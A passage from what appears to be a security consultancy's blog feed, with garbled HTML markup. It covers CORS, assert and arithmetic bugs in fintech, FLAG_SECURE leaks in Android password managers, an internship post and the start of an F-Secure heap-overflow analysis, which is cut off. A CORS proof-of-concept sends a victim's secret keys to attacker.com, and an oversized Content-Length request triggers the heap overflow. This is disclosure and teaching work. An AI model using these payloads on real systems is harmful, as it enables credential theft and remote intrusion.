class=shttps://attacker.com/corsbug/span span class=nt/gt;/span /code/pre/div/div div class=language-html highlighter-rougediv class=highlightpre class=highlightcodespan class=ntlt;htmlgt;/span span class=ntlt;bodygt;/span span class=ntlt;scriptgt;/span span class=kdvar/span span class=nxreq/span span class=o=/span span class=knew/span span class=nxXMLHttpRequest/spanspan class=p();/span span class=nxreq/spanspan class=p./spanspan class=nxonload/span span class=o=/span span class=nxcallback/spanspan class=p;/span span class=nxreq/spanspan class=p./spanspan class=nxopen/spanspan class=p(/spanspan class=dl'/spanspan class=s1GET/spanspan class=dl'/spanspan class=p,/span span class=dl'/spanspan class=s1https://bitcoinbank/keys/spanspan class=dl'/spanspan class=p,/span span class=kctrue/spanspan class=p);/span span class=nxreq/spanspan class=p./spanspan class=nxwithCredentials/span span class=o=/span span class=kctrue/spanspan class=p;/span span class=nxreq/spanspan class=p./spanspan class=nxsend/spanspan class=p();/span span class=kdfunction/span span class=nxcallback/spanspan class=p()/span span class=p{/span span class=nxlocation/spanspan class=o=/spanspan class=dl'/spanspan class=s1https://attacker.com/?dump=/spanspan class=dl'/spanspan class=o+/spanspan class=kthis/spanspan class=p./spanspan class=nxresponseText/spanspan class=p;/span span class=p};/span span class=ntlt;/scriptgt;/span span class=ntlt;/bodygt;/span /code/pre/div/div pWhen the victim visits the crafted page, the attacker can perform a request to code class=language-plaintext highlighter-rougehttps://bitcoinbank/keys/code and retrieve their secret keys./p pThis can also happen when the code class=language-plaintext highlighter-rougeAccess-Control-Allow-Origin/code response header is dynamically updated to the same domain as specified by the emOrigin/em request header./p h4 id=referencesReferences:/h4 ul lia href=https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bountieshttps://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties/a/li lia href=https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained//a/li /ul h4 id=checklistChecklist:/h4 ul liEnsure that your code class=language-plaintext highlighter-rougeAccess-Control-Allow-Origin/code is never set to code class=language-plaintext highlighter-rougenull/code/li liEnsure that code class=language-plaintext highlighter-rougeAccess-Control-Allow-Origin/code is not taken from a user-controlled variable or header/li liEnsure that you are not dynamically copying the value of the code class=language-plaintext highlighter-rougeOrigin/code HTTP header into code class=language-plaintext highlighter-rougeAccess-Control-Allow-Origin/code/li /ul h2 id=2-asserts-and-compilers2) Asserts and Compilers/h2 pIn some programming languages, optimizations performed by the compiler can have undesirable results. This could manifest in many different quirks due to specific compiler or language behaviors, however there is a specific class of idiosyncrasies that can have devastating effects./p pLet’s consider this Python code as an example:/p div class=language-python highlighter-rougediv class=highlightpre class=highlightcodespan class=c1# All deposits should belong to the same CRYPTO address /spanspan class=kassert/span span class=nball/spanspan class=p([/spanspan class=nx/spanspan class=p./spanspan class=ndeposit_address/span span class=o==/span span class=naddress/span span class=kfor/span span class=nx/span span class=owin/span span class=ndeposits/spanspan class=p])/span /code/pre/div/div pAt first sight, there is nothing wrong with this code. Yet, there is actually a quite severe bug. The problem is that Python runs with code class=language-plaintext highlighter-rouge__debug__/code by default. This allows for assert statements like the security control illustrated above. When the code gets compiled to optimized byte code (code class=language-plaintext highlighter-rouge*.pyo files/code) and lands into production, all asserts are gone. As a result, the application will not enforce any security checks./p pSimilar behaviors exist in many languages and with different compiler options, including emC/C++/em, emSwift/em, emClosure/em and many more./p pFor example, let’s consider the following emSwift/em code:/p div class=language-swift highlighter-rougediv class=highlightpre class=highlightcodespan class=c1// No assert if password is == mysecret/span span class=kif/span span class=p(/spanspan class=npassword/span span class=o!=/span span class=smysecretpw/spanspan class=p)/span span class=p{/span span class=nfassertionFailure/spanspan class=p(/spanspan class=sPassword not correct!/spanspan class=p)/span span class=p}/span /code/pre/div/div pIf you were to run this code in Xcode, then it would simply hit your code class=language-plaintext highlighter-rougeassertionFailure/code in case of an incorrect password. This is because Xcode compiles the application without any optimizations using the code class=language-plaintext highlighter-rouge-Onone/code flag. If you were to build the same code for the Apple Store instead, the check would be optimized out leading to no password check at all since the execution will continue. Note that there are many things wrong in those three lines of code./p pTalking about assertions, emPHP/em takes the first place and de-facto facilitates RCE when you run a href=https://wiki.php.net/rfc/deprecations_php_7_2#assert_with_string_argumentasserts with a string argument/a. This is due to the argument getting evaluated through the standard code class=language-plaintext highlighter-rougeeval/code./p h4 id=references-1References:/h4 ul lia href=https://medium.com/@alecoconnor/asserts-in-swift-and-why-you-should-be-using-them-6a7c96eaec10https://medium.com/@alecoconnor/asserts-in-swift-and-why-you-should-be-using-them-6a7c96eaec10/a/li lia href=https://docs.openstack.org/bandit/latest/plugins/b101_assert_used.htmlhttps://docs.openstack.org/bandit/latest/plugins/b101_assert_used.html/a/li lia href=https://wiki.php.net/rfc/deprecations_php_7_2#assert_with_string_argumenthttps://wiki.php.net/rfc/deprecations_php_7_2#assert_with_string_argument/a/li /ul h4 id=checklist-1Checklist:/h4 ul liDo not use code class=language-plaintext highlighter-rougeassert/code statements for guarding code and enforcing security checks/li liResearch for compiler optimizations gotchas in the language you use/li /ul h2 id=3-arithmetic-errors3) Arithmetic Errors/h2 pA bug class that is also easy to overlook in fin-tech systems pertains to arithmetic operations. Negative numbers and overflows can create money out of thin air./p pFor example, let’s consider a withdrawal function that looks for the amount of money in a certain wallet. Being able to pass a negative number could be abused to generate money for that account./p pImagine the following example code:/p div class=language-python highlighter-rougediv class=highlightpre class=highlightcodespan class=kif/span span class=ndata/spanspan class=p[/spanspan class=swallet/spanspan class=p]./spanspan class=nbalance/span span class=olt;/span span class=ndata/spanspan class=p[/spanspan class=samount/spanspan class=p]:/span span class=nerror_dict/spanspan class=p[/spanspan class=swallet_balance/spanspan class=p]/span span class=o=/span span class=p(/spanspan class=sWithdrawal exceeds available balance/spanspan class=p)/span span class=p.../span span class=ndata/spanspan class=p[/spanspan class=swallet/spanspan class=p]./spanspan class=nbalance/span span class=o=/span span class=ndata/spanspan class=p[/spanspan class=swallet/spanspan class=p]./spanspan class=nbalance/span span class=o-/span span class=ndata/spanspan class=p[/spanspan class=samount/spanspan class=p]/span /code/pre/div/div pThe code class=language-plaintext highlighter-rougeif/code statement correctly checks if the balance is higher than the requested amount. However, the code does not enforce the use of a positive number./p pLet’s try with code class=language-plaintext highlighter-rouge-100/code coins in a wallet account having code class=language-plaintext highlighter-rouge200/code coins./p pThe check would be satisfied and the code responsible for updating the amount would look like the following:/p div class=language-python highlighter-rougediv class=highlightpre class=highlightcodespan class=ndata/spanspan class=p[/spanspan class=swallet/spanspan class=p]./spanspan class=nbalance/span span class=o=/span span class=mi200/span span class=o-/span span class=p(/spanspan class=o-/spanspan class=mi100/spanspan class=p)/span span class=c1# 300 coins /span/code/pre/div/div pThis would enable an attacker to get free money out of the system./p pTalking about numbers and arithmetic, there are also well-known bugs affecting lower-level languages in which code class=language-plaintext highlighter-rougesigned/code vs code class=language-plaintext highlighter-rougeunsigned/code types come to play./p pIn most architectures, a code class=language-plaintext highlighter-rougesigned/code short integer is a em2 bytes/em type that can hold a negative number and a positive number. In memory, positive numbers are represented as code class=language-plaintext highlighter-rouge1 == 0x0001/code, code class=language-plaintext highlighter-rouge2 == 0x0002/code and so forth. Instead, negative numbers are represented as two’s complement code class=language-plaintext highlighter-rouge-1 == 0xffff/code,code class=language-plaintext highlighter-rouge-2 == 0xfffe/code and so forth. These representations meet on code class=language-plaintext highlighter-rouge0x7fff/code, which enables a signed integer to hold a value between code class=language-plaintext highlighter-rouge-32768/code and code class=language-plaintext highlighter-rouge32767/code./p pLet’s take a look at an example with pseudo-code:/p div class=language-c highlighter-rougediv class=highlightpre class=highlightcodespan class=ktsigned/span span class=ktshort/span span class=ktint/span span class=nbank_account/span span class=o=/span span class=o-/spanspan class=mi30000/span /code/pre/div/div pAssuming the system still allows withdrawals (e.g. perhaps a loan), the following code will be exercised:/p div class=language-c highlighter-rougediv class=highlightpre class=highlightcodespan class=ktint/span span class=nfwithdraw/spanspan class=p(/spanspan class=ktsigned/span span class=ktshort/span span class=ktint/span span class=nmoney/spanspan class=p){/span span class=nbank_account/span span class=o-=/span span class=nmoney/span span class=p}/span /code/pre/div/div pAs we know, the max negative value is code class=language-plaintext highlighter-rouge-32768/code. What happens if a user withdraws code class=language-plaintext highlighter-rouge2768 + 1/code ?/p div class=language-c highlighter-rougediv class=highlightpre class=highlightcodespan class=nwithdraw/spanspan class=p(/spanspan class=mi2769/spanspan class=p);/span span class=c1//32767/span /code/pre/div/div pYes! No longer in debt thanks to integer wrapping. Current balance is now code class=language-plaintext highlighter-rouge32767/code./p h4 id=references-2References:/h4 ul lia href=https://blog.feabhas.com/2014/10/vulnerabilities-in-c-when-integers-go-bad/https://blog.feabhas.com/2014/10/vulnerabilities-in-c-when-integers-go-bad//a/li lia href=https://en.cppreference.com/w/cpp/language/typeshttps://en.cppreference.com/w/cpp/language/types/a/li lia href=https://gcc.gnu.org/ml/gcc-help/2011-07/msg00219.htmlhttps://gcc.gnu.org/ml/gcc-help/2011-07/msg00219.html/a/li /ul h4 id=checklist-2Checklist:/h4 ul liVerify that the transaction systems and other components dealing with financial arithmetic do not accept negative numbers/li liVerify integer boundaries, and whether correct code class=language-plaintext highlighter-rougesigned/code vs code class=language-plaintext highlighter-rougeunsigned/code types are used across the entire codebase. Note that the signed integer overflow is considered emundefined behavior/em./li /ul h2 id=4-password-reset-token-leakage-via-referer4) Password Reset Token Leakage Via Referer/h2 pLast but not least, we would like to introduce a simple infoleak bug. This is a very widespread issue present in the password reset mechanism of many web platforms./p pimg src=../../../public/images/passwordreset.png alt=Vulnerability Impact align=center width=400 //p pA standard procedure for a password reset in modern web applications involves the use of a emsecret/em link sent out to the user via email. The secret is used as an authentication token to prove that the recipient had access to the email associated with the user’s registration./p pThose links typically take the form of code class=language-plaintext highlighter-rougehttps://example.com/passwordreset/2a8c5d7e-5c2c-4ea6-9894-b18436ea5320/code or code class=language-plaintext highlighter-rougehttps://example.com/passwordreset?token=2a8c5d7e-5c2c-4ea6-9894-b18436ea5320/code./p pBut what actually happens when the user clicks the link?/p pWhen a web browser requests a resource, it typically adds an HTTP header, called the code class=language-plaintext highlighter-rougeReferer/code header indicating the URL of the resource from which the request originated. If the resource being requested resides on a different domain, the code class=language-plaintext highlighter-rougeReferer/code header is still generally included in the cross-domain request. It is not uncommon that the password reset page loads external JavaScript resources such as libraries and tracking code. Under those circumstances, the password reset token will be also sent to the 3rd-party domains./p div class=language-plaintext highlighter-rougediv class=highlightpre class=highlightcodeGET /libs/jquery.js HTTP/1.1 Host: 3rdpartyexampledomain.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Referer: https://example.com/passwordreset/2a8c5d7e-5c2c-4ea6-9894-b18436ea5320 Connection: close /code/pre/div/div pAs a result, personnel working for the affected 3rd-party domains and having access to the web server access logs might be able to take over accounts of the vulnerable web platform./p h4 id=references-3References:/h4 ul lia href=https://portswigger.net/kb/issues/00500400_cross-domain-referer-leakagehttps://portswigger.net/kb/issues/00500400_cross-domain-referer-leakage/a/li lia href=https://thoughtbot.com/blog/is-your-site-leaking-password-reset-linkshttps://thoughtbot.com/blog/is-your-site-leaking-password-reset-links/a/li /ul h4 id=checklist-3Checklist:/h4 ul liIf possible, applications should never transmit any sensitive information within the URL query string/li liIn case of password reset links, the code class=language-plaintext highlighter-rougeReferer/code header should always be removed using one of the following techniques: ul liBlank landing page under the web platform domain, followed by a redirect/li liOriginate the navigation from a pseudo-URL document, such as code class=language-plaintext highlighter-rougedata:/code or code class=language-plaintext highlighter-rougejavascript:/code/li liUsing code class=language-plaintext highlighter-rougelt;iframe src=about:blankgt;/code/li liUsing code class=language-plaintext highlighter-rougelt;meta name=referrer content=no-referrer /gt;/code/li liSetting an appropriate code class=language-plaintext highlighter-rougeReferrer-Policy/code header, assuming your application supports recent browsers only/li /ul /li /ul pstrongIf you would like to talk about securing your platform, contact us at a href=mailto:[email protected]@doyensec.com/a!/strong/p

One Bug To Rule Them All: Modern Android Password Managers and FLAG_SECURE Misuse

21 August 2019 at 22:00
pA few months ago I stumbled upon a 2016 a href=https://commonsware.com/blog/2016/06/06/psa-flag-secure-window-leaks.htmlblog post/a by Mark Murphy, warning about the state of code class=language-plaintext highlighter-rougeFLAG_SECURE/code window leaks in Android. This class of vulnerabilities has been around for a while, hence I wasn’t confident that I could still leverage the same weakness in modern Android applications. As it often turns out, I was being too optimistic. After a brief survey, I discovered that the issue still persists today in many password manager applications (and others)./p h2 id=the-problemThe problem/h2 pThe a href=https://developer.android.com/reference/android/view/WindowManager.LayoutParams.html#FLAG_SECUREcode class=language-plaintext highlighter-rougeFLAG_SECURE/code/a setting was initially introduced as an additional setting to code class=language-plaintext highlighter-rougeWindowManager.LayoutParams/code to prevent DRM-protected content from appearing in screenshots, video screencaps or from being viewed on “a href=https://developer.android.com/reference/android/view/Display.html#FLAG_SECUREnon-secure displays/a”./p pThis last term was created to distinguish between a href=https://developer.android.com/reference/android/media/projection/MediaProjection#createVirtualDisplay(java.lang.String,%2520int,%2520int,%2520int,%2520int,%2520android.view.Surface,%2520android.hardware.display.VirtualDisplay.Callback,%2520android.os.Handler)virtual screens/a created by the a href=https://developer.android.com/reference/android/media/projection/MediaProjectionMediaProjection API/a (a native API to capture screen contents) and physical display devices like TV screens (having a DRM-secure video output). In this way Google forestalled the piracy apps issue by preventing unsigned apps from creating virtual “secure” displays, only allowing casting to physical “secure” devices.br / While code class=language-plaintext highlighter-rougeFLAG_SECURE/code nowadays serves its original purpose well em(to the delight of e.g. Netflix, Google Play Movies, Youtube Red)/em, strongdevelopers during the years mistook this “secure” flag as an easy catch-all security feature/strong provided by Android to mark the entire app from being excepted from a screen capture or recording./p pUnfortunately, strongthis functionality is not global for the entire app/strong, but can only be set on specific screens that contain sensitive data. To make matters worse, every Android fragment used in the application will not respect the code class=language-plaintext highlighter-rougeFLAG_SECURE/code set for the activity and won’t pass down the flag to any other code class=language-plaintext highlighter-rougeWindow/code instances created on behalf of that activity. As a consequence of this, several native UI components like code class=language-plaintext highlighter-rougeSpinner/code,code class=language-plaintext highlighter-rougeToast/code,code class=language-plaintext highlighter-rougeDialog/code,code class=language-plaintext highlighter-rougePopupWindow/code and many others will still leak their content to third party applications having the right permissions./p h2 id=the-approachThe approach/h2 pAfter a short survey, I decided to investigate a category of apps in which a content leak would have had the biggest impact: mobile password managers. This would also be the category of applications a generic attacker would probably choose to target first, along with banking apps.br / With this in mind, I fired up a screen capture application (a href=https://github.com/afollestad/mnmlmnml/a) and started poking around. After a few days of testing, strongevery Android password manager examined (4) was found to be vulnerable to some extent/strong./p pThe following sections provide a summary of the discovered issues. All vulnerabilities were disclosed to the vendors throughout the second week of May 2019./p h3 id=1password1Password/h3 pIn a href=https://1password.com/1Password/a, the Account Settings’ section offers a way to manage 1Password accounts. One of the functionalities is “Large Type”, which allows showing an account’s Secret Key in a large, easy-to-read format. The fragment showing the Secret Key leaks the generated password to third-party applications installed on the victim’s device. The Secret Key is combined with the user’s Master Password to create the full encryption key used to encrypt the accounts data, a href=https://support.1password.com/secret-key-security/#how-your-secret-key-protects-youprotecting them on the server side/a./p div style=text-align: center; img src=../../../public/images/1password-leak.jpg width=250 title=1Password Secret Key Leak Vulnerability alt=1Password Secret Key Leak Vulnerability align=center style=display: block; margin-left: auto; margin-right: auto; / /div pThis was fixed in 1Password for Android in version a href=https://app-updates.agilebits.com/product_history/OPA4#v70105057.1.5/a, which was released on May 29, 2019./p h3 id=keeperKeeper/h3 pWhen a user taps the password field, a href=https://keepersecurity.com/Keeper/a shows a “Copied to Clipboard” toast. But if the user shows the cleartext password with the “Eye” icon, the toast will also contain the secret cleartext password. This fragment showing the copied password leaks the password to third-party applications./p div style=text-align: center; img src=../../../public/images/keeper-leak-1.jpg width=250 style=padding: 5px; border-radius: 10px; display: inline-block; margin-left: auto; margin-right: auto; title=Keeper Password Leak Vulnerability (without FLAG_SECURE set) alt=Keeper Password Leak Vulnerability (without FLAG_SECURE set) align=center / img src=../../../public/images/keeper-leak-2.jpg width=250 style=padding: 5px; border-radius: 10px; display: inline-block; margin-left: auto; margin-right: auto; title=Keeper Password Leak Vulnerability (with FLAG_SECURE set) alt=Keeper Password Leak Vulnerability (with FLAG_SECURE set) align=center / /div pThis was fixed in Keeper for Android version 14.3.0, which was released on June 21, 2019. a href=https://docs.keeper.io/release-notes/mobile-platforms/android/android-version-14.3.0An official advisory was also issued/a./p h3 id=dashlaneDashlane/h3 pDashlane features a random password generation functionality, usable when an account entry is inserted or edited. Unfortunately, the window responsible for choosing the parameter for the “safe” passwords is visible by third parties applications on the victim’s device./p div style=text-align: center; img src=../../../public/images/dashlane-leak-1.jpg width=250 style=border-radius: 10px; display: block; margin-left: auto; margin-right: auto; title=Dashlane Password Leak Vulnerability alt=Dashlane Password Leak Vulnerability align=center / /div pNote that it is also possible for an attacker to infer the service associated with the leaked password, since the services list and autocomplete fragment is also missing the code class=language-plaintext highlighter-rougeFLAG_SECURE/code flag, resulting in its leak./p div style=text-align: center; img src=../../../public/images/dashlane-leak-2.jpg style=padding: 5px; border-radius: 10px; display: inline-block; margin-left: auto; margin-right: auto; width=250 alt=Dashlane Leak Vulnerability align=center / img src=../../../public/images/dashlane-leak-3.jpg style=padding: 5px; border-radius: 10px; display: inline-block; margin-left: auto; margin-right: auto; width=250 alt=Dashlane Leak Vulnerability align=center / /div pThe issue was fixed in Dashlane for Android in version a href=https://support.dashlane.com/hc/en-us/articles/206553939-Release-notes#title26.1929.2/a./p h2 id=the-attack-scenarioThe attack scenario/h2 pSeveral scenarios would result in an app being installed on a user’s phone recording their activity. These include:/p ul liMalicious casting apps requiring record permission, since users usually don’t know that casting apps can also record their screen;/li liInnocuous-looking apps using a href=http://cloak-and-dagger.org/Cloak amp; Dagger/a attacks;/li liMalicious app installed through third-party Android app stores or a href=https://www.blackhat.com/docs/us-17/thursday/us-17-Anderson-Bot-Vs-Bot-Evading-Machine-Learning-Malware-Detection-wp.pdfbypassing/a a href=https://security.googleblog.com/2018/03/android-security-2017-year-in-review.htmlspan title=Potentially Harmful ApplicationsPHA/span detection filters/a of the Play Store;/li liMalicious app pushed to the smartphone using the Play Store feature in a a href=http://fc16.ifca.ai/preproceedings/24_Konoth.pdfMan-in-the-Browser/a attack scenario;/li /ul pIf these scenarios seem unlikely to happen in real life, it is worth noting that there have been a href=https://elleenpan.com/files/panoptispy.pdfseveral/a a href=https://www.zdnet.com/article/android-security-password-stealing-trojan-malware-sneaks-in-google-play-store-in-bogus-apps/instances/a of apps abusing this class of attacks in the recent past./p pMany thanks to the em1Password/em, emKeeper/em, and emDashlane/em security teams that handled the report in a professional way, issued a payout, and allowed the disclosure. strongPlease remember that using a password manager is still the best choice these days to protect your digital accounts and that all the above issues are now fixed./strong/p pAs always, this research was possible thanks to my a href=https://doyensec.com/careers.html25% research time/a at Doyensec!/p

Internship at Doyensec

4 November 2019 at 23:00
blockquote pem“Our moral responsibility is not to stop the future, but to shape it…”/em — Alvin Toffler/p /blockquote pAt Doyensec, we feel responsible for what the future of information security will look like. We want a safe and open Internet and we believe that emhackers/em play an important role. As a part of our give back strategy, we want to find ways of transferring our knowledge to new generations./p pDoyensec interns work alongside experienced security researchers during live customer engagements. They receive full time support from senior staff members and are encouraged to explore individual research projects. Additionally, they are included in all team meetings so they can learn and share in the different experiences arising from our work. In short, we want to provide a comprehensive experience on what it means to be a first-class security consultant in the vulnerability research space./p pThe internship program @Doyensec represents an opportunity to learn new infosec skills. We also hope it becomes a memorable personal experience. It lasts 2-3 months and is a mix of remote and in-person interactions./p h3 id=we-offer-each-candidate-a-transparent-recruitment-process-in-3-simple-stepsWe offer each candidate a transparent recruitment process in 3 simple steps:/h3 ul li1) Introductory call to understand one’s motivation for applying and their availability over the upcoming months/li li2) Online challenges to evaluate technical skillset (web security testing)/li li3) Final call to discuss details/li /ul div style=text-align: center; img src=../../../public/images/intern.jpeg title=Doyensec internship process alt=Doyensec internship process align=center style=display: block; margin-left: auto; margin-right: auto; / /div h3 id=day-1Day 1/h3 pDay one is important. Interns will be responsible for setting up their Doyensec provided machine and will be introduced to the team. They will be assigned to a senior security researcher who will be at their disposal and act as mentor throughout the entire internship. They will learn how we schedule projects, communicate, and cooperate to ensure complete coverage during our testing activities. We will provide them with all necessary equipment to perform the work. Most importantly, they will learn about our values and things that we consider crucial for delivering high quality work./p h3 id=time-allocationTime allocation/h3 pWhile the internship is considered full time over the course of 2/3 months, we did have interns who were still studying and wanted to combine both work and school. We take pride in having a flexible company culture oriented around results and our approach to the internship is no different./p blockquote pem“For knowledge work, time spent has little to do with value created and the forty hour workweek is anachronistic nonsense.”/em — Naval Ravikant @naval/p /blockquote pWork days are generally grouped into two categories:/p pa) strongCustomer projects/strong. Interns work on real-life projects. Whenever possible, we will try to match personal interest and skillset with tasks when allocating projects./p pb) strongResearch time/strong. We strongly a href=https://doyensec.com/research.htmlbelieve in research/a and practice, therefore we allow interns to spend 50% of their time on emresearch/em topics. We will define goals together and provide guidance and feedback on the progress./p h3 id=testimonialTestimonial/h3 pMohamed Ouad is a student of computer science at the University of Milan. In the fall of 2018 he joined Doyensec as our second intern. We asked him a few questions to summarize his experience:/p pWhat did you learn during your internship?br / em“During this period I had the possibility to learn a lot of things, and not just technical stuff. For instance, I understood how to explain findings to non-technical audience and manage projects with strict deadlines.”/em/p pHave you improved your skillset?br / em“Definitely! I improved my knowledge of Android security and got interested in Google Chrome extensions security, static code review and Electron-based apps security.”/em/p pWill the internship have an impact on your career?br / em“This experience has given me a huge added value to my career path. I’ve not only learned a lot, but also created an important item in my curriculum that will be certainly useful for future opportunities. I suggest this “adventure” to everyone!”/em/p h4 id=more-information-on-our-internship-programMore information on our internship program/h4 pThe Doyensec internship program is open to students returning to full-time education for at least one semester. We accept candidates with residency in either US or Europe./p pWhat do we offer:/p ul liOpportunity to perform professional security testing for both start ups and Fortune 500 companies/li liAbility to perform cutting-edge offensive research projects/li liFeedback and guidance/li liAttractive financial compensation/li /ul h4 id=what-do-we-expect-from-candidatesWhat do we expect from candidates?/h4 pOur perfect candidate:/p ul liHas already some experience with manual source code review and Burp Suite / OWASP ZAP/li liLearns quickly/li liShould be able to prepare reports in English/li liIs self-organized/li liIs able to learn from his/her mistakes/li liHas motivation to work/study and show initiative/li liMust be communicative (without this it is difficult to teach effectively)/li liBrings something to the mix (e.g. creativity, academic knowledge, etc.)/li /ul pIn contrast to full-time positions (emwe are always hiring web and mobile pentesters!/em), a good attitude is the most important factor we are looking for./p pstrongDo you want to join Doyensec as an intern?/strong Send your resume to a href=mailto:[email protected]@doyensec.com/a!/p

Heap Overflow in F-Secure Internet Gatekeeper

2 February 2020 at 23:00
h2 id=f-secure-internet-gatekeeper-heap-overflow-explainedF-Secure Internet Gatekeeper heap overflow explained/h2 pThis blog post illustrates a vulnerability we discovered in the strongF-Secure Internet Gatekeeper/strong application. It shows how a simple mistake can lead to an exploitable unauthenticated remote code execution vulnerability./p h3 id=reproduction-environment-setupReproduction environment setup/h3 pAll testing should be reproducible in a a href=http://isoredirect.centos.org/centos/7/isos/x86_64/CentOS-7-x86_64-DVD-1908.isoCentOS/a virtual machine, with at least 1 processor and 4GB of RAM./p pAn installation of a href=https://help.f-secure.com/product.html?business/igk/5.40/en/concept_16E400B3FDE344EDB1F699EE9C4117DB-5.40-enF-Secure Internet Gatekeeper/a will be needed. It used to be possible to download it from a href=https://www.f-secure.com/en/business/downloads/internet-gatekeeperhttps://www.f-secure.com/en/business/downloads/internet-gatekeeper/a. As far as we can tell, the vendor no longer provides the vulnerable version./p pThe original affected package has the following SHA256 hash: code class=language-plaintext highlighter-rouge1582aa7782f78fcf01fccfe0b59f0a26b4a972020f9da860c19c1076a79c8e26/code./p pProceed with the installation:/p ol li(1) If you’re using an x64 version of CentOS, execute code class=language-plaintext highlighter-rougeyum install glibc.i686/code/li li(2) Install the Internet Gatekeeper binary using code class=language-plaintext highlighter-rougerpm -I lt;fsigkbingt;.rpm/code/li li(3) For a better debugging experience, install gdb 8+ and a href=https://github.com/hugsy/gefhttps://github.com/hugsy/gef/a/li /ol pNow you can use GHIDRA/IDA or your favorite dissassembler/decompiler to start reverse engineering Internet Gatekeeper!/p h3 id=the-targetThe target/h3 pAs described by F-Secure, Internet Gatekeeper is a “highly effective and easy to manage protection solution for corporate networks at the gateway level”./p pF-Secure Internet Gatekeeper contains an admin panel that runs on port em9012/tcp/em. This may be used to control all of the services and rules available in the product (HTTP proxy, IMAP proxy, etc.). This admin panel is served over HTTP by the emfsikgwebui/em binary which is written in C. In fact, the whole web server is written in C/C++; there are some references to civetweb, which suggests that a customized version of a href=https://github.com/civetweb/civetwebCivetWeb/a may be in use./p pThe fact that it was written in C/C++ lead us down the road of looking for memory corruption vulnerabilities which are usually common in this language./p pIt did not take long to find the issue described in this blog post by fuzzing the admin panel with a href=https://github.com/denandz/fuzzotronFuzzotron/a which uses a href=https://gitlab.com/akihe/radamsaRadamsa/a as the underlying engine. code class=language-plaintext highlighter-rougefuzzotron/code has built-in TCP support for easily fuzzing network services. For a seed, we extracted a valid code class=language-plaintext highlighter-rougePOST/code request that is used for changing the language on the admin panel. This request can be performed by unauthenticated users, which made it a good candidate as fuzzing seed./p pWhen analyzing the input mutated by code class=language-plaintext highlighter-rougeradamsa/code we could quickly see that the root cause of the vulnerability revolved around the code class=language-plaintext highlighter-rougeContent-length/code header. The generated test that crashed the software had the following header value: code class=language-plaintext highlighter-rougeContent-Length: 21487483844/code. This suggests an overflow due to incorrect Integer math./p pAfter running the test through code class=language-plaintext highlighter-rougegdb/code we discovered that the code responsible for the crash lies in the code class=language-plaintext highlighter-rougefs_httpd_civetweb_callback_begin_request/code function. This method is responsible for handling incoming connections and dispatching them to the relevant functions depending on which HTTP verbs, paths or cookies are used./p pTo demonstrate the issue we’re going to send a code class=language-plaintext highlighter-rougePOST/code request to port code class=language-plaintext highlighter-rouge9012/code where the admin panel is running. We set a very big code class=language-plaintext highlighter-rougeContent-Length/code header value./p div class=language-plaintext highlighter-rougediv class=highlightpre class=highlightcodePOST /submit HTTP/1.1 Host: 192.168.0.24:9012 Content-Length: 21487483844 AAAAAAAAAAAAAAAAAAAAAAAAAAA /code/pre/div/div pThe application will parse the request and execute the code class=language-plaintext highlighter-rougefs_httpd_get_header/code function to retrieve the content length. Later, the content length is passed to the function code class=language-plaintext highlighter-rougestrtoul/code (emString to Unsigned Long/em)/p pThe following pseudo code provides a summary of the control flow:/p div class=language-plaintext highlighter-rougediv class=highlightpre class=highlightcodecontent_len = fs_httpd_get_header(header_struct, Content-Length); if ( content_len ){ content_len_new = strtoul(content_len_old, 0, 10); } /code/pre/div/div pWhat exactly happens in the code class=language-plaintext highlighter-rougestrtoul/code function can be understood by reading the corresponding code class=language-plaintext highlighter-rougeman/code pages. The return value of code class=language-plaintext highlighter-rougestrtoul/code is an unsigned long int, which can have a largest possible value of code class=language-plaintext highlighter-rouge2^32-1/code (on 32 bit systems)./p div class=language-plaintext highlighter-rougediv class=highlightpre class=highlightcodeThe strtoul() function returns either the result of the conversion or, if there was a leading minus sign, the negation of the result of the conversion represented as an unsigned value, unless the original (nonnegated) value would overflow; in the latter case, strtoul() returns ULONG_MAX and sets errno to ERANGE. Precisely the same holds for strtoull() (with ULLONG_MAX instead of ULONG_MAX). /code/pre/div/div pAs our provided code class=language-plaintext highlighter-rougeContent-Length/code is too large for an unsigned long int, code class=language-plaintext highlighter-rougestrtoul/code will return the ULONG_MAX value which corresponds to code class=language-plaintext highlighter-rouge0xFFFFFFFF/code on 32 bit systems./p pSo far so good. Now comes the actual bug. When the code class=language-plaintext highlighter-rougefs_httpd_civetweb_callback_begin_request/code function tries to issue a malloc request to make room for our data, it first adds 1 to the code class=language-plaintext highlighter-rougecontent_length/code variable and then calls code class=language-plaintext highlighter-rougemalloc/code./p pThis can be seen in the following pseudo code:/p div class=language-c highlighter-rougediv class=highlightpre class=highlightcodespan class=c1// fs_malloc == malloc/span span class=ndata_by_post_on_heap/span span class=o=/span span class=nfs_malloc/spanspan class=p(/spanspan class=ncontent_len_new/span span class=o+/span span class=mi1/spanspan class=p)/span /code/pre/div/div pThis causes a problem as the value code class=language-plaintext highlighter-rouge0xFFFFFFFF + 1/code will cause an integer overflow, which results in code class=language-plaintext highlighter-rouge0x00000000/code. So the malloc call will allocate 0 bytes of memory./p pMalloc does allow invocations with a 0 bytes argument. When code class=language-plaintext highlighter-rougemalloc(0)/code is called a valid pointer to the heap will be returned, pointing to an allocation with the minimum possible chunk size of 0x10 bytes. The specifics can be also read in the man pages:/p div class=language-plaintext highlighter-rougediv class=highlightpre class=highlightcodeThe malloc() function allocates size bytes and returns a pointer to the allocated memory. The memory is not initialized. If size is 0, then malloc() returns either NULL, or a unique pointer value that can later be successfully passed to free(). /code/pre/div/div pIf we go a bit further down in the Internet Gatekeeper code, we can see a call to code class=language-plaintext highlighter-rougemg_read/code./p div class=language-c highlighter-rougediv class=highlightpre class=highlightcodespan class=c1// content_len_new is without the addition of 0x1./span span class=c1// so content_len_new == 0xFFFFFFFF/span span class=kif/spanspan class=p(/spanspan class=ncontent_len_new/spanspan class=p){/span span class=ktint/span span class=nbytes_read/span span class=o=/span span class=nmg_read/spanspan class=p(/spanspan class=nheader_struct/spanspan class=p,/span span class=ndata_by_post_on_heap/spanspan class=p,/span span class=ncontent_len_new/spanspan class=p)/span span class=p}/span /code/pre/div/div pDuring the overflow, this code will read an arbitrary amount of data onto the heap - without any restraints. For exploitation, this is a great primitive since we can stop writing bytes to the HTTP stream and the software will simply shut the connection and continue. Under these circumstances, we have complete control over how many bytes we want to write./p pIn summary, strongwe can leverage 